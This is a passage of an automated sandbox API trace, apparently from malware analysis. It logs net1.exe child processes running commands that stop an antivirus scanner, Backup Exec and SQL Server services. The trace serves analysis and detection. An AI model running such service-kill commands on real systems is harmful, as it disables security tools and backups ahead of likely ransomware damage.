(in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x766160, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0113.767] WriteFile (in: hFile=0x0, lpBuffer=0x766160, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x33fcd0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fcd0, lpOverlapped=0x0) returned 0 [0113.767] LocalFree (hMem=0x766160) returned 0x0 [0113.767] GetFileType (hFile=0x0) returned 0x0 [0113.767] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x766160 [0113.767] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x766160, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nv", lpUsedDefaultChar=0x0) returned 2 [0113.767] WriteFile (in: hFile=0x0, lpBuffer=0x766160, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33fcd0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fcd0, lpOverlapped=0x0) returned 0 [0113.768] LocalFree (hMem=0x766160) returned 0x0 [0113.768] NetApiBufferFree (Buffer=0x761ad8) returned 0x0 [0113.768] NetApiBufferFree (Buffer=0x761af0) returned 0x0 [0113.768] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop RTVscan /y" [0113.768] exit (_Code=2) Process: id = "180" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1ba76000" os_pid = "0x1218" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "78" os_parent_pid = "0xe90" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecDiveciMediaService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 567 os_tid = 0x121c [0113.473] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efbfc | out: lpSystemTimeAsFileTime=0x1efbfc*(dwLowDateTime=0x17659a30, dwHighDateTime=0x1d6f0d1)) [0113.473] GetCurrentProcessId () returned 0x1218 [0113.474] GetCurrentThreadId () returned 0x121c [0113.474] GetTickCount () returned 0x114fb12 [0113.474] QueryPerformanceCounter (in: lpPerformanceCount=0x1efbf4 | out: lpPerformanceCount=0x1efbf4*=23257444969) returned 1 [0113.474] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0113.474] __set_app_type (_Type=0x1) [0113.474] __p__fmode () returned 0x770331f4 [0113.474] __p__commode () returned 0x770331fc [0113.474] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0113.474] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0113.474] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.474] GetConsoleOutputCP () returned 0x1b5 [0113.475] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0113.475] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.478] sprintf_s (in: _DstBuf=0x1efbb4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.478] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.643] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0113.643] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0113.643] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecDiveciMediaService /y" [0113.643] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ef980, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0113.643] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8c) returned 0x4b4ae0 [0113.643] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.644] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1efb84 | out: Buffer=0x1efb84*=0x4b1b18) returned 0x0 [0113.644] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1efb84 | out: Buffer=0x1efb84*=0x4b1b30) returned 0x0 [0113.644] _fileno (_File=0x77032900) returned -2 [0113.644] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0113.644] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.644] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.644] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.644] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.644] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.644] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.644] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.644] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.644] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.644] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.644] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.644] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.644] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.644] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.644] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.644] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.644] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.644] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.645] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.645] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.645] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.645] _wcsicmp (_String1="accounts", _String2="BackupExecDiveciMediaService") returned -1 [0113.645] _wcsicmp (_String1="computer", _String2="BackupExecDiveciMediaService") returned 1 [0113.645] _wcsicmp (_String1="config", _String2="BackupExecDiveciMediaService") returned 1 [0113.645] _wcsicmp (_String1="continue", _String2="BackupExecDiveciMediaService") returned 1 [0113.645] _wcsicmp (_String1="cont", _String2="BackupExecDiveciMediaService") returned 1 [0113.645] _wcsicmp (_String1="file", _String2="BackupExecDiveciMediaService") returned 4 [0113.645] _wcsicmp (_String1="files", _String2="BackupExecDiveciMediaService") returned 4 [0113.645] _wcsicmp (_String1="group", _String2="BackupExecDiveciMediaService") returned 5 [0113.645] _wcsicmp (_String1="groups", _String2="BackupExecDiveciMediaService") returned 5 [0113.645] _wcsicmp (_String1="help", _String2="BackupExecDiveciMediaService") returned 6 [0113.645] _wcsicmp (_String1="helpmsg", _String2="BackupExecDiveciMediaService") returned 6 [0113.645] _wcsicmp (_String1="localgroup", _String2="BackupExecDiveciMediaService") returned 10 [0113.645] _wcsicmp (_String1="pause", _String2="BackupExecDiveciMediaService") returned 14 [0113.645] _wcsicmp (_String1="session", _String2="BackupExecDiveciMediaService") returned 17 [0113.645] _wcsicmp (_String1="sessions", _String2="BackupExecDiveciMediaService") returned 17 [0113.645] _wcsicmp (_String1="sess", _String2="BackupExecDiveciMediaService") returned 17 [0113.645] _wcsicmp (_String1="share", _String2="BackupExecDiveciMediaService") returned 17 [0113.645] _wcsicmp (_String1="start", _String2="BackupExecDiveciMediaService") returned 17 [0113.645] _wcsicmp (_String1="stats", _String2="BackupExecDiveciMediaService") returned 17 [0113.645] _wcsicmp (_String1="statistics", _String2="BackupExecDiveciMediaService") returned 17 [0113.645] _wcsicmp (_String1="stop", _String2="BackupExecDiveciMediaService") returned 17 [0113.645] _wcsicmp (_String1="time", _String2="BackupExecDiveciMediaService") returned 18 [0113.645] _wcsicmp (_String1="user", _String2="BackupExecDiveciMediaService") returned 19 [0113.645] _wcsicmp (_String1="users", _String2="BackupExecDiveciMediaService") returned 19 [0113.645] _wcsicmp (_String1="msg", _String2="BackupExecDiveciMediaService") returned 11 [0113.645] _wcsicmp (_String1="messenger", _String2="BackupExecDiveciMediaService") returned 11 [0113.646] _wcsicmp (_String1="receiver", _String2="BackupExecDiveciMediaService") returned 16 [0113.646] _wcsicmp (_String1="rcv", _String2="BackupExecDiveciMediaService") returned 16 [0113.646] _wcsicmp (_String1="netpopup", _String2="BackupExecDiveciMediaService") returned 12 [0113.646] _wcsicmp (_String1="redirector", _String2="BackupExecDiveciMediaService") returned 16 [0113.646] _wcsicmp (_String1="redir", _String2="BackupExecDiveciMediaService") returned 16 [0113.646] _wcsicmp (_String1="rdr", _String2="BackupExecDiveciMediaService") returned 16 [0113.646] _wcsicmp (_String1="workstation", _String2="BackupExecDiveciMediaService") returned 21 [0113.646] _wcsicmp (_String1="work", _String2="BackupExecDiveciMediaService") returned 21 [0113.646] _wcsicmp (_String1="wksta", _String2="BackupExecDiveciMediaService") returned 21 [0113.646] _wcsicmp (_String1="prdr", _String2="BackupExecDiveciMediaService") returned 14 [0113.646] _wcsicmp (_String1="devrdr", _String2="BackupExecDiveciMediaService") returned 2 [0113.646] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecDiveciMediaService") returned 10 [0113.646] _wcsicmp (_String1="server", _String2="BackupExecDiveciMediaService") returned 17 [0113.646] _wcsicmp (_String1="svr", _String2="BackupExecDiveciMediaService") returned 17 [0113.646] _wcsicmp (_String1="srv", _String2="BackupExecDiveciMediaService") returned 17 [0113.646] _wcsicmp (_String1="lanmanserver", _String2="BackupExecDiveciMediaService") returned 10 [0113.646] _wcsicmp (_String1="alerter", _String2="BackupExecDiveciMediaService") returned -1 [0113.646] _wcsicmp (_String1="netlogon", _String2="BackupExecDiveciMediaService") returned 12 [0113.646] _wcsupr (in: _String="BackupExecDiveciMediaService" | out: _String="BACKUPEXECDIVECIMEDIASERVICE") returned="BACKUPEXECDIVECIMEDIASERVICE" [0113.646] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4b54d0 [0113.730] GetServiceKeyNameW (in: hSCManager=0x4b54d0, lpDisplayName="BACKUPEXECDIVECIMEDIASERVICE", lpServiceName=0x39aaf0, lpcchBuffer=0x1efb20 | out: lpServiceName="", lpcchBuffer=0x1efb20) returned 0 [0113.738] _wcsicmp (_String1="msg", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 11 [0113.738] _wcsicmp (_String1="messenger", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 11 [0113.739] _wcsicmp (_String1="receiver", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 16 [0113.739] _wcsicmp (_String1="rcv", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 16 [0113.739] _wcsicmp (_String1="redirector", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 16 [0113.739] _wcsicmp (_String1="redir", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 16 [0113.739] _wcsicmp (_String1="rdr", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 16 [0113.739] _wcsicmp (_String1="workstation", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 21 [0113.739] _wcsicmp (_String1="work", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 21 [0113.739] _wcsicmp (_String1="wksta", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 21 [0113.739] _wcsicmp (_String1="prdr", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 14 [0113.739] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 2 [0113.739] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 10 [0113.739] _wcsicmp (_String1="server", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 17 [0113.739] _wcsicmp (_String1="svr", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 17 [0113.739] _wcsicmp (_String1="srv", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 17 [0113.739] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 10 [0113.739] _wcsicmp (_String1="alerter", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned -1 [0113.739] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECDIVECIMEDIASERVICE") returned 12 [0113.739] NetServiceControl (in: servername=0x0, service="BACKUPEXECDIVECIMEDIASERVICE", opcode=0x0, arg=0x0, bufptr=0x1efb1c | out: bufptr=0x1efb1c) returned 0x889 [0113.770] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.770] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0113.770] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.771] GetFileType (hFile=0x0) returned 0x0 [0113.771] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4b3b50 [0113.771] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4b3b50, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0113.771] WriteFile (in: hFile=0x0, lpBuffer=0x4b3b50, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1efa5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efa5c, lpOverlapped=0x0) returned 0 [0113.771] LocalFree (hMem=0x4b3b50) returned 0x0 [0113.771] GetFileType (hFile=0x0) returned 0x0 [0113.771] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4b6188 [0113.771] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4b6188, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nK", lpUsedDefaultChar=0x0) returned 2 [0113.772] WriteFile (in: hFile=0x0, lpBuffer=0x4b6188, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efa5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efa5c, lpOverlapped=0x0) returned 0 [0113.772] LocalFree (hMem=0x4b6188) returned 0x0 [0113.772] _ultow (in: _Dest=0x889, _Radix=2030220 | out: _Dest=0x889) returned="2185" [0113.772] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.772] GetFileType (hFile=0x0) returned 0x0 [0113.772] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4b6188 [0113.772] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4b6188, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0113.772] WriteFile (in: hFile=0x0, lpBuffer=0x4b6188, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1efa68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efa68, lpOverlapped=0x0) returned 0 [0113.772] LocalFree (hMem=0x4b6188) returned 0x0 [0113.772] GetFileType (hFile=0x0) returned 0x0 [0113.772] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4b6188 [0113.772] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4b6188, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nK", lpUsedDefaultChar=0x0) returned 2 [0113.772] WriteFile (in: hFile=0x0, lpBuffer=0x4b6188, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efa68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efa68, lpOverlapped=0x0) returned 0 [0113.772] LocalFree (hMem=0x4b6188) returned 0x0 [0113.773] NetApiBufferFree (Buffer=0x4b1b18) returned 0x0 [0113.773] NetApiBufferFree (Buffer=0x4b1b30) returned 0x0 [0113.773] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecDiveciMediaService /y" [0113.773] exit (_Code=2) Process: id = "181" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x20f8f000" os_pid = "0x1220" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "70" os_parent_pid = "0xe04" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 568 os_tid = 0x1224 [0113.507] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35fc84 | out: lpSystemTimeAsFileTime=0x35fc84*(dwLowDateTime=0x176a5cf0, dwHighDateTime=0x1d6f0d1)) [0113.507] GetCurrentProcessId () returned 0x1220 [0113.507] GetCurrentThreadId () returned 0x1224 [0113.507] GetTickCount () returned 0x114fb31 [0113.507] QueryPerformanceCounter (in: lpPerformanceCount=0x35fc7c | out: lpPerformanceCount=0x35fc7c*=23260768190) returned 1 [0113.507] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0113.507] __set_app_type (_Type=0x1) [0113.507] __p__fmode () returned 0x770331f4 [0113.507] __p__commode () returned 0x770331fc [0113.507] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0113.508] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0113.508] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.508] GetConsoleOutputCP () returned 0x1b5 [0113.508] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0113.508] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.511] sprintf_s (in: _DstBuf=0x35fc3c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.511] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.650] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0113.650] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0113.650] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SYSTEM_BGC /y" [0113.650] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35fa08, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0113.650] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x74) returned 0x71f658 [0113.650] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.651] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fc0c | out: Buffer=0x35fc0c*=0x721af8) returned 0x0 [0113.651] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fc0c | out: Buffer=0x35fc0c*=0x721b10) returned 0x0 [0113.651] _fileno (_File=0x77032900) returned -2 [0113.651] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0113.651] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.651] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.651] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.651] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.651] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.651] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.651] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.651] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.651] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.651] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.651] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.651] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.651] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.651] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.651] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.651] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.651] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.651] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.651] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.651] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.651] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.651] _wcsicmp (_String1="accounts", _String2="MSSQL$SYSTEM_BGC") returned -12 [0113.651] _wcsicmp (_String1="computer", _String2="MSSQL$SYSTEM_BGC") returned -10 [0113.651] _wcsicmp (_String1="config", _String2="MSSQL$SYSTEM_BGC") returned -10 [0113.652] _wcsicmp (_String1="continue", _String2="MSSQL$SYSTEM_BGC") returned -10 [0113.652] _wcsicmp (_String1="cont", _String2="MSSQL$SYSTEM_BGC") returned -10 [0113.652] _wcsicmp (_String1="file", _String2="MSSQL$SYSTEM_BGC") returned -7 [0113.652] _wcsicmp (_String1="files", _String2="MSSQL$SYSTEM_BGC") returned -7 [0113.652] _wcsicmp (_String1="group", _String2="MSSQL$SYSTEM_BGC") returned -6 [0113.652] _wcsicmp (_String1="groups", _String2="MSSQL$SYSTEM_BGC") returned -6 [0113.652] _wcsicmp (_String1="help", _String2="MSSQL$SYSTEM_BGC") returned -5 [0113.652] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SYSTEM_BGC") returned -5 [0113.652] _wcsicmp (_String1="localgroup", _String2="MSSQL$SYSTEM_BGC") returned -1 [0113.652] _wcsicmp (_String1="pause", _String2="MSSQL$SYSTEM_BGC") returned 3 [0113.652] _wcsicmp (_String1="session", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.652] _wcsicmp (_String1="sessions", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.652] _wcsicmp (_String1="sess", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.652] _wcsicmp (_String1="share", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.652] _wcsicmp (_String1="start", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.652] _wcsicmp (_String1="stats", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.652] _wcsicmp (_String1="statistics", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.652] _wcsicmp (_String1="stop", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.652] _wcsicmp (_String1="time", _String2="MSSQL$SYSTEM_BGC") returned 7 [0113.652] _wcsicmp (_String1="user", _String2="MSSQL$SYSTEM_BGC") returned 8 [0113.652] _wcsicmp (_String1="users", _String2="MSSQL$SYSTEM_BGC") returned 8 [0113.652] _wcsicmp (_String1="msg", _String2="MSSQL$SYSTEM_BGC") returned -12 [0113.652] _wcsicmp (_String1="messenger", _String2="MSSQL$SYSTEM_BGC") returned -14 [0113.652] _wcsicmp (_String1="receiver", _String2="MSSQL$SYSTEM_BGC") returned 5 [0113.652] _wcsicmp (_String1="rcv", _String2="MSSQL$SYSTEM_BGC") returned 5 [0113.652] _wcsicmp (_String1="netpopup", _String2="MSSQL$SYSTEM_BGC") returned 1 [0113.652] _wcsicmp (_String1="redirector", _String2="MSSQL$SYSTEM_BGC") returned 5 [0113.652] _wcsicmp (_String1="redir", _String2="MSSQL$SYSTEM_BGC") returned 5 [0113.653] _wcsicmp (_String1="rdr", _String2="MSSQL$SYSTEM_BGC") returned 5 [0113.653] _wcsicmp (_String1="workstation", _String2="MSSQL$SYSTEM_BGC") returned 10 [0113.653] _wcsicmp (_String1="work", _String2="MSSQL$SYSTEM_BGC") returned 10 [0113.653] _wcsicmp (_String1="wksta", _String2="MSSQL$SYSTEM_BGC") returned 10 [0113.653] _wcsicmp (_String1="prdr", _String2="MSSQL$SYSTEM_BGC") returned 3 [0113.653] _wcsicmp (_String1="devrdr", _String2="MSSQL$SYSTEM_BGC") returned -9 [0113.653] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SYSTEM_BGC") returned -1 [0113.653] _wcsicmp (_String1="server", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.653] _wcsicmp (_String1="svr", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.653] _wcsicmp (_String1="srv", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.653] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SYSTEM_BGC") returned -1 [0113.653] _wcsicmp (_String1="alerter", _String2="MSSQL$SYSTEM_BGC") returned -12 [0113.653] _wcsicmp (_String1="netlogon", _String2="MSSQL$SYSTEM_BGC") returned 1 [0113.653] _wcsupr (in: _String="MSSQL$SYSTEM_BGC" | out: _String="MSSQL$SYSTEM_BGC") returned="MSSQL$SYSTEM_BGC" [0113.653] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x725448 [0113.730] GetServiceKeyNameW (in: hSCManager=0x725448, lpDisplayName="MSSQL$SYSTEM_BGC", lpServiceName=0x39aaf0, lpcchBuffer=0x35fba8 | out: lpServiceName="", lpcchBuffer=0x35fba8) returned 0 [0113.740] _wcsicmp (_String1="msg", _String2="MSSQL$SYSTEM_BGC") returned -12 [0113.740] _wcsicmp (_String1="messenger", _String2="MSSQL$SYSTEM_BGC") returned -14 [0113.740] _wcsicmp (_String1="receiver", _String2="MSSQL$SYSTEM_BGC") returned 5 [0113.740] _wcsicmp (_String1="rcv", _String2="MSSQL$SYSTEM_BGC") returned 5 [0113.740] _wcsicmp (_String1="redirector", _String2="MSSQL$SYSTEM_BGC") returned 5 [0113.740] _wcsicmp (_String1="redir", _String2="MSSQL$SYSTEM_BGC") returned 5 [0113.740] _wcsicmp (_String1="rdr", _String2="MSSQL$SYSTEM_BGC") returned 5 [0113.740] _wcsicmp (_String1="workstation", _String2="MSSQL$SYSTEM_BGC") returned 10 [0113.740] _wcsicmp (_String1="work", _String2="MSSQL$SYSTEM_BGC") returned 10 [0113.740] _wcsicmp (_String1="wksta", _String2="MSSQL$SYSTEM_BGC") returned 10 [0113.740] _wcsicmp (_String1="prdr", _String2="MSSQL$SYSTEM_BGC") returned 3 [0113.740] _wcsicmp (_String1="devrdr", _String2="MSSQL$SYSTEM_BGC") returned -9 [0113.740] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SYSTEM_BGC") returned -1 [0113.740] _wcsicmp (_String1="server", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.740] _wcsicmp (_String1="svr", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.740] _wcsicmp (_String1="srv", _String2="MSSQL$SYSTEM_BGC") returned 6 [0113.740] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SYSTEM_BGC") returned -1 [0113.740] _wcsicmp (_String1="alerter", _String2="MSSQL$SYSTEM_BGC") returned -12 [0113.740] _wcsicmp (_String1="netlogon", _String2="MSSQL$SYSTEM_BGC") returned 1 [0113.740] NetServiceControl (in: servername=0x0, service="MSSQL$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0x35fba4 | out: bufptr=0x35fba4) returned 0x889 [0113.774] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.774] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0113.775] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, 